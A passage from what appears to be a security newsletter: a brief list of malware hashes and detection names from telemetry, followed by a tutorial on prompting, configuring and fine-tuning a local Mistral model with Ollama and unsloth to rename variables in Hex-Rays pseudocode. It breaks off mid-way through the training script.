Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

Large Language Models (LLMs) such as those provided by OpenAI (GPT-3/4), Google (Gemini), and Anthropic (Claude) can be a useful tool to include when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is that the data you are reviewing is processed server-side, meaning any data analyzed by the tool must be uploaded/sent to the provider's servers.

While these services provide privacy policies that may double-pinky-swear your data is safe and will not be used for training if you opt out, as consultants we are often working with client data that is under NDA, preventing the use of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this, with OpenAI publicly confirming it monitors the usage of its service to identify potentially 'evil' usage by bad actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • service may go away (outage/sale)
  • modified to prevent malicious use (RE/Exploitation often flagged)
    • potentially resulting in monitoring or an account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging a LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and the model parameter count - this can be thought of as the amount of 'knowledge' or data stored within the model; more parameters indicate more 'knowledge' it can reference based on your input. OpenAI does not provide the details of GPT-4; GPT-3 had over 100 billion parameters, while GPT-3.5's size has not been disclosed - speculation/research/guessing indicates it is much smaller (~22b parameters), due to fine-tuning and/or other 'secret sauce'. Speculation places the original GPT-4 in the trillion-plus parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range; this is obviously a clear disadvantage and will result in lower-quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to depend on how much memory you have available - a decent rule is that the model will occupy 2x the memory of its parameter count: 2b/4GB, 7b/14GB, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating-point values for its parameters; however, by clipping these values to smaller units (8/4-bit), the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.
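
As a back-of-the-envelope check of that rule (a rough estimate that ignores runtime overhead such as the context/KV cache):

```python
# Memory estimate: parameters * bytes per parameter. Treat as a floor,
# since runtime overhead (context/KV cache, etc.) is not included.
def model_memory_gb(params_billions: float, bits_per_param: int = 16) -> float:
    return params_billions * 1e9 * (bits_per_param / 8) / 1e9

for params in (2, 7, 70):
    for bits in (16, 8, 4):
        print(f"{params}b @ {bits}-bit: ~{model_memory_gb(params, bits):.0f} GB")
```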

When it comes to the actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally with 24GB of VRAM, meaning an NVIDIA 3090 or 4090 - a used 3090 is the best value for a turnkey solution. The next best setup is going to be an Apple Silicon (ARM) MacBook/Studio/etc. - while this may be contentious, it is difficult to match the performance due to the shared memory architecture, as you are able to use system RAM for compute without a performance hit. While it is possible to run these models from system RAM using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results are most likely going to be slow. Of course there are caveats here; as with anything, you will find cases where highly tuned setups can perform well - in this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally; in this case I am using Ollama, as it just works and is fairly batteries-included for most use cases. Ollama provides installers for OSX, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry; the required files will automatically download and you will enter an interactive 'chat' shell:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case to apply it to. In this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models that have been trained on code should be able to aid with this task. I have chosen to work with Mistral's 7b model - while there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size, and I really wanted to target something that would be relatively performant on lower-end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}
```

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response looks promising, but trying to use it programmatically would be difficult. We can do better by adjusting our prompt to include instructions to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output:

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these is ideal, as we only want the JSON structure so we can parse it programmatically. By adjusting the prompt, we can try to guide the output towards what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better - it follows our instructions and produced only a valid JSON structure. However, if we run the same input again, the output varies and returns a slightly different structure, along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path, changing the instructions to try to describe what the expected output should be for a given input, but eventually the response will deviate in some way and break our ability to programmatically interface with it. Instead of trying to describe what we want, we can provide an example of what we want the model to generate (single/multi-shot prompting). An important thing to remember when dealing with an LLM is that it is predicting the next token/word to output based on the current input; by providing an example exchange, you are creating a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the same instructions as before, as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we could even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that performs the specific task we want relatively well, and the response is parsable JSON suitable for automated use.

Light Customization

If you have a specific use case (agent/assistant/task), you can configure a version of the underlying pre-trained weights through Ollama's Modelfile interface. A Modelfile provides a lightweight layer to control/configure precomputed weights that can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# TEMPLATE is the format of the interactions with the model;
# this uses templating provided by ollama, where .System
# and .Prompt are replaced with the defined variables
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with; there are some special values
# included within this prompt (described below) - for now, this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To side-track for a second: each model has its own prompt format that is required to be used, as well as specific tokens used to indicate what is an instruction and to mark the start/stop of an exchange - these values can be found within the tokenizer configuration file (tokenizer_config.json). For instance, Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.
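If you have the transformers library installed, you can render a model's chat template directly instead of reading the Jinja by hand. A minimal sketch, assuming access to the Hugging Face hub for the tokenizer files:

from transformers import AutoTokenizer

tok = AutoTokenizer.from_pretrained("mistralai/Mistral-7B-Instruct-v0.1")
messages = [{"role": "user", "content": "Analyze the following code: ..."}]
# apply_chat_template renders the messages using the model's chat_template,
# wrapping user content in [INST]...[/INST] and adding the bos_token
print(tok.apply_chat_template(messages, tokenize=False))
# <s>[INST] Analyze the following code: ... [/INST]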

After saving the Modelfile to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md), which can be used as seen in the following simple Python client:

import requests, json

def do_analysis(code):
    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model and want the full (non-streamed) response
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False, "format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        # the API returns a JSON envelope; the model's JSON answer is a string under 'response'
        return json.loads(res.json()['response'])
    except (KeyError, ValueError):
        print('error unpacking response')
        print(res.json().get('response'))


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA plugin that would work OK - but we can do better.

Fine-Tuning - step one: draw two circles

The initial training and creation of the model weights that get released is a computationally expensive process, while follow-on fine-tuning is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be conducted multiple times until the model matches the expected behavior.

While our small local model is never going to compete with a large, hosted service across the board, fine-tuning can be used to boost its performance so it can compete on specific tasks or knowledge domains. To carry out a fine-tune of a model, you need to complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

For this task, the knowledge domain is already known - we want to fine-tune a model that can aid with analysis of Hex-Rays pseudocode. The next step is constructing a dataset, and this is the difficult part. At a high level, the dataset will be made of "instruction-following" examples; the following shows what these look like:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples show two types of instruction-following dataset entries. The first example specifies the instruction to be followed, a matching input (user input), and finally the ideal output (generated result). The second example only provides an instruction along with an example output - this form is useful for generative-only responses that do not require user input; it is not that useful for our current task but is included as an example. A dataset entry that would be useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact JSON formatting will allow for using the datasets library from Hugging Face, and it is a common format for instruction datasets.
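As a quick illustration, loading entries in this format is a one-liner with the datasets library (a minimal sketch, assuming the entries above are collected into a file named dataset.json):

from datasets import load_dataset

# each record carries the instruction/input/output keys shown above
dataset = load_dataset("json", data_files="dataset.json", split="train")
print(dataset[0]["instruction"])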

With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high-quality responses. I had considered trying to manually create the required dataset using tree-sitter to rewrite valid code with generic variable names while sourcing the function descriptions from documentation - this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html), I decided to try the same style of approach. The basic idea of this workflow is to use an LLM to build your dataset based on a smaller - or in this case incomplete - dataset and train against that:

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export every function's Hex-Rays output into individual files named by address (a minimal export sketch follows this list)
  • strip the compiled libraries and repeat the previous step, exporting every function's Hex-Rays output into a new set of files
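The export step can be scripted from inside IDA. The following is a minimal sketch of the idea, assuming a Hex-Rays license and that the output directory already exists; only the directory name changes between the symbol and stripped passes:

import idautils, ida_hexrays

outdir = "symbol"  # or "stripp" for the stripped pass
for ea in idautils.Functions():
    try:
        pseudocode = str(ida_hexrays.decompile(ea))
    except ida_hexrays.DecompilationFailure:
        continue  # skip anything Hex-Rays cannot handle
    with open(f"{outdir}/0x{ea:x}.c", "w") as f:
        f.write(pseudocode)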

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high-level this process looks like the following:

  • using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
  • iterate over all the files until complete

After completing this step, we have a large instruction-following dataset we can use to fine-tune against. A rough sketch of this generation loop follows.
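The following is a minimal sketch of that loop under the assumptions from earlier (the iDAPalSimple model configured above, the symbol/stripp directory layout, and the local Ollama endpoint; the instruction text is abbreviated here):

import os, json, requests

INSTRUCTION = ("Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object "
               "containing the keys 'function_name','comment', and an array 'variables' ...")

records = []
for name in os.listdir("symbol"):
    with open(f"symbol/{name}") as f:
        symbol_code = f.read()    # high-quality input: full debug/symbol info
    with open(f"stripp/{name}") as f:
        stripped_code = f.read()  # what the model will see at inference time
    # query our configured model with the symbol/debug output to get a reasonable-quality answer
    res = requests.post("http://localhost:11434/api/generate", json={
        "model": "iDAPalSimple", "prompt": symbol_code, "stream": False, "format": "json"})
    records.append({
        "instruction": INSTRUCTION,
        "input": stripped_code,
        "output": res.json()["response"],
    })

with open("dataset.json", "w") as f:
    json.dump(records, f)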

Heavy Customization

There are quite a few options when it comes to carrying out a fine-tune of an LLM; at the time of this research project I chose to use unsloth. Other popular projects exist that are most likely more batteries-included.

I went with unsloth for a few reasons, the main one being that the underlying code has been tuned to provide a large performance increase (speed/memory usage); it also seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!) - I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions; at the time of this project, installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adapted from the examples provided by unsloth; it uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
